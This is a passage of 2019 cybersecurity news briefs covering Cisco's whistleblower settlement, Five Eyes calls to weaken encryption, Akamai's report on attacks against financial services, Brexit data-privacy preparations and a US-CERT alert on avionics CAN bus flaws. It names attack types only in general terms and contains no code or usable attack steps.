In addition, over 60% claimed the profession is getting better – or much better – at dealing with security incidents when they occur, while less than half (48%) said the same about defending systems from attack and protecting data. In fact, 14% said the profession is getting worse at this.

This highlights a general trend of organizations being forced to broaden their approach from prevention alone to include incident response.

“IT security is a constant war of attrition between security teams and attackers, and attackers have more luxury to innovate and try new approaches,” said Amanda Finch, CEO of the Chartered Institute of Information Security.

“As a result, the industry’s focus on dealing with breaches after they occur, rather than active prevention, isn’t a great surprise – the former is where IT teams have much more control. Yet in order to deal with breaches effectively, security teams still need the right resources and to increase those in line with the threat. Otherwise they will inevitably have to make compromises.”

Categories: Cyber Risk News

Cisco Pays $8.6m to Settle Software Flaw Claims

Thu, 08/01/2019 - 08:06

Cisco has agreed to pay $8.6m to settle a lawsuit filed by a client alleging the networking giant knowingly sold video surveillance kit containing serious security vulnerabilities.

US law firm Phillips & Cohen said it filed a qui tam, or whistleblower, lawsuit on behalf of James Glenn, a consultant for a Cisco partner company of Danish origin. The firm is said to have fired Glenn after he submitted a report to Cisco detailing the flaws.

Although Cisco eventually fixed the software flaws, the lawsuit alleged that the firm potentially exposed the federal and state-level agencies that used the equipment.

The settlement covers sales of Cisco’s Video Surveillance Manager from 2007 to 2014. The system allows customers to manage and connect multiple internet-connected cameras through a central server.

Whistleblower attorney Claire Sylvia argued that many federal and state agencies depended on Cisco’s video surveillance systems to help monitor security at their facilities.

“Our client raised important security concerns. We alleged in our complaint that the software flaws were so severe that they compromised the security of the video surveillance systems and any computer system connected to them,” said Sylvia.

“Cybersecurity products are an important piece of government spending these days, and it’s essential that those products comply with critical regulatory and contractual requirements. The tech industry can expect whistleblowers to continue to step forward when serious problems are ignored, thanks to laws that reward and protect them.”

Cisco will pay the federal government and 15 states, as well as various cities, counties and other regional US administrations. Glenn himself will receive around $1.6m.

According to Cisco, this payment settles litigation originally brought in 2011. It revealed in a blog post that the software in question came from an acquisition of Broadware in 2007.

“Because of the open architecture, video feeds could theoretically have been subject to hacking, though there is no evidence that any customer’s security was ever breached. In 2009, we published a Best Practices Guide emphasizing that users needed to pay special attention to building necessary security features on top of the software they were licensing from us,” explained general counsel Mark Chandler.

“In July, 2013, we advised that customers should upgrade to a new version of the software which addressed security features. All sales of the older versions of the software had ended by September, 2014.”

Categories: Cyber Risk News

#CyberSecuredForum: Answers to Security Questions

Wed, 07/31/2019 - 14:47

On the final day of the Cyber: Secured Forum in Dallas, moderators hosted a series of discussions in which attendees played a crucial part in putting forth solutions to some of the most pressing cyber–physical topics facing the security industry.

Attendees were divided into four different groups to collaborate on responses to some of the biggest cyber–physical challenges, including:

  • The Tenets of a Cybersecurity Hardening Guide
  • Privacy in the Age of Connected Devices
  • Show Me the Money: The Considerations for Monetizing Cybersecurity as an Integrator
  • Gap Analysis – How the Security Industry Should Address Cybersecurity

In coming together to share their responses, attendees expressed their collective ideas. One of the key concerns for integrators is understanding how to monetize cybersecurity. In order to do this successfully, integrators need to acquire an array of skill sets that they might not have. For those that are looking to grow and be the experienced industry provider, they need to rely on the skills of others while they themselves grow and learn.

While it’s not all about the money, business is all about the money. Unfortunately, connectivity has opened up a Pandora’s box of opportunity and challenges for the physical security industry. Integrators are seeking to monetize cybersecurity services while ensuring new threats to their customers are mitigated in the systems they deploy.

In looking at privacy in the age of connected devices, attendees recognize that the lack of security in the internet of things poses not only digital but also physical privacy vulnerabilities. As such, solutions providers are working to ensure that their connected products are hardened out of the box and that the folks deploying them have the guidance to ensure that they provide customer value, not cybersecurity headaches.

The security industry needs to shift its siloed thinking in order to really address cybersecurity. One overarching theme of the Cyber: Secured Forum was that the lines between physical and cybersecurity are slowly disappearing. The vulnerabilities are overlapping, the risks are expanding and the ability to mitigate risks is hampered by an ever-growing skills gap. Collaboration, now more than ever, is key.

Categories: Cyber Risk News

#CyberSecuredForum: Physical, Cyber Unite

Wed, 07/31/2019 - 13:41

Physical and cyber are two sides of the same “security industry” coin, said George Finney, CISO, Southern Methodist University, in his keynote speech on the closing day of the Cyber: Secured Forum.

“There’s not really a difference from the hacker perspective. They are trying to use whatever avenue they can to exploit your company,” Finney said. Where once penetration testers might have only tested the network, now Finney has pen testers come to campus and try to break into the wireless network or use social engineering methods to access areas of campus where they aren’t supposed to be.

While the university is charged with protecting student data, Finney said, “We also want to protect them, wherever they are.”

The security industry is made up of people. In physical and cybersecurity, “both of us make our spouses sit with their backs to the restaurant so that we can see all the exits. We both integrate highly complex technologies, and we both know that the bad guys are going to figure out what our defenses are,” Finney said.

For years, it was believed that you couldn't have cybersecurity without physical security, but today, Finney said, the opposite is also true.

Finney shared lessons he learned as the CISO of Southern Methodist University, which has integrated support for physical security technologies and cybersecurity on the same team, prompted by a major event on campus.

The opening ceremony of the George W. Bush Presidential Library and Museum was planned on the SMU campus, and Finney explained that the Secret Service told him that the event would be the biggest security event because five living presidents would be in attendance.

Finney said that his team had completed a campus-wide lock-down initiative, centralized support and improved response times to strengthen security for the event with the help of an integrator. The initiatives then had the lingering effect of improving the student experience, which has successfully helped to reduce crime on campus – all while hardening systems against hacking.

Categories: Cyber Risk News

We Must Weaken Encryption, Say ‘Five Eyes’ Ministers

Wed, 07/31/2019 - 13:32

Senior ministers from the UK, Australia, Canada, New Zealand and the United States have announced their support of weakening encryption, essentially asking tech companies to install backdoors in encrypted communications.

The news comes following a two-day security summit in London, where home affairs, interior security and immigration ministers of the ‘Five Eyes’ countries discussed current and emerging threats which could undermine national and global security.

As detailed in an official UK government release, “During a roundtable with tech firms, ministers stressed that law enforcement agencies’ efforts to investigate and prosecute the most serious crimes would be hampered if the industry carries out plans to implement end-to-end encryption, without the necessary safeguards.”

Home Secretary Priti Patel said: “The Five Eyes are united that tech firms should not develop their systems and services, including end-to-end encryption, in ways that empower criminals or put vulnerable people at risk.

“We heard today about the devastating and lifelong impact of child sexual exploitation and abuse, and agreed firm commitments to collaborate to get ahead of the threat.

“As Governments, protecting our citizens is our top priority, which is why through the unique and binding partnership of Five Eyes we will tackle these emerging threats together.”

Also speaking at the conclusion of the two-day conference was United States Attorney General William P. Barr. Barr said that encryption presents a unique challenge and that the Five Eyes partnership has a duty to protect public safety, including in matters related to the internet.

“We must ensure that we do not stand by as advances in technology create spaces where criminal activity of the most heinous kind can go undetected and unpunished.”

However, Javvad Malik, security awareness advocate at KnowBe4, said that calls to weaken encryption, or to place backdoors in, are periodically made by ill-informed politicians.

“No matter how hotly this is debated, it can't change the maths behind encryption, which will either work or not. Weakening encryption will do more harm than good, as it will leave all communication vulnerable and allow bad actors to compromise legitimate traffic,” he argued.

Categories: Cyber Risk News

Criminals Target FinServ With Layered Attacks

Wed, 07/31/2019 - 13:07

Organizations in the financial services sector have repeatedly been impacted by attackers leveraging credential stuffing and unique phishing attempts, according to newly released data in Akamai’s 2019 State of the Internet/Security Financial Services Attack Economy Report.

The report found that 50% of all the companies impacted by observed phishing domains were in the financial services sector. The report reflects the analysis of 3.5 billion attempts during an 18-month period that have put the personal data and banking information of financial services customers at risk.

Researchers observed that, between December 2, 2018, and May 4, 2019, 197,524 phishing domains were discovered. Customers were directly targeted in 66% of those attacks. In addition, “94% of the attacks against the financial services sector came from one of four methods: SQL Injection (SQLi), Local File Inclusion (LFI), Cross-Site Scripting (XSS), and OGNL Java Injection (which accounted for more than 8 million attempts during this reporting period), based on Akamai’s calculations,” according to the report.

“We’ve seen a steady rise in credential stuffing attacks over the past year, fed in part by a growth in phishing attacks against consumers,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Criminals supplement existing stolen credential data through phishing, and then one way they make money is by hijacking accounts or reselling the lists they create. We’re seeing a whole economy developing to target financial services organizations and their consumers.”

Criminals are using "bank drops," which researchers explained are packages of data that include a person’s stolen identity, that can be used to open accounts at a given financial institution. The packages are known as "fullz" by criminals online and include an individual’s name, address, date of birth, Social Security details, driver’s license information and credit score.

While financial institutions are trying to understand the methods criminals are using to open these drop accounts, attackers are gaining more success because they continue to target the financial services industry.

“Attackers are targeting financial services organizations at their weak points: the consumer, web applications and availability, because that’s what works,” said McKeay. “Businesses are becoming better at detecting and defending against these attacks, but point defenses are bound to fail. It requires being able to detect, analyze, and defend against an intelligent criminal who’s using multiple different types of tools for a business to protect its customers.”

Categories: Cyber Risk News

UK Firms Move Operations as Brexit Data Fears Grow

Wed, 07/31/2019 - 10:30

UK businesses are stepping up their preparations for a potentially tortuous split from the EU, with a third moving some operations to the continent to avoid data privacy regulatory issues, according to new research.

Business process outsourcer Parseq polled 500 decision makers in businesses with 250+ employees about how Brexit might impact their current data privacy obligations.

Although the GDPR is technically transposed into UK law, the country will require an “adequacy decision” from the European Commission to ensure unhindered data flows after it leaves the trading bloc – something that is certainly not guaranteed.

That’s why the vast majority (89%) of firms polled by Parseq said they’d taken proactive measures.

Around a third (35%) said they’d refocused their client base to the UK, while a similar number (32%) had transferred operations to the EU.

Nearly two-fifths (37%) said they have audited data flows to and from the EU, and even more (42%) have sought advice from the regulator, the Information Commissioner’s Office (ICO).

Craig Naylor-Smith, managing director at Parseq, argued that UK firms are currently operating on shifting sands given the lack of clarity over post-Brexit data transfer arrangements.

“The Data Protection Act (2018) transposed the GDPR into UK law, but if the rules in Europe diverge once we leave the EU it could make transferring personal data to and from the continent more difficult — a vital consideration for businesses in our increasingly connected, digital world,” he added.

“With this in mind, it’s encouraging to see so many firms take proactive steps to prepare for the prospect of regulatory changes. However, with an even proportion of firms increasing their European presence and refocusing their position to the UK, it’s clear the best course of action will depend on individual strategies.”

The bottom line is: UK businesses must consider how Brexit could impact data privacy regulations as a matter of urgency, he said.

Categories: Cyber Risk News

US Government Issues Light Aircraft Cyber Alert

Wed, 07/31/2019 - 09:15

The US-CERT has been forced to issue an ICS alert after a security researcher revealed major cybersecurity shortcomings in small aircraft which could enable attackers to cause crashes.

The issues lie with CAN bus networks, a common feature of automobiles, which connect electronic sensors and actuators.

“An attacker with physical access to the aircraft could attach a device to an avionics CAN bus that could be used to inject false data, resulting in incorrect readings in avionic equipment,” the alert noted.

“The researchers have outlined that engine telemetry readings, compass and attitude data, altitude, airspeeds, and angle of attack could all be manipulated to provide false measurements to the pilot. The researchers have further outlined that a pilot relying on instrument readings would be unable to distinguish between false and legitimate readings, which could result in loss of control of the affected aircraft.”

The research itself was carried out by Rapid7’s Patrick Kiley, who is also a pilot. He spotted an over-reliance in the avionics sector on physical security and called for more defense-in-depth.

“Just as football helmets may actually raise the risk of brain injuries, the increased perceived physical security of aircraft may be paradoxically making them more vulnerable to cyber-attack, not less,” he argued in a blog post introducing the research.

“Think about it: if you felt like your internal LAN was totally and completely untouchable by attackers, you probably wouldn't worry much about software patching or password management. Of course, LANs aren't impregnable, and neither are CAN bus networks, so we're worried about this mindset when it comes to avionics security.”

The hope is that, just as greater scrutiny of these systems in the automotive industry has led to steps being taken to mitigate risk, the same can happen in the light aircraft space.

Categories: Cyber Risk News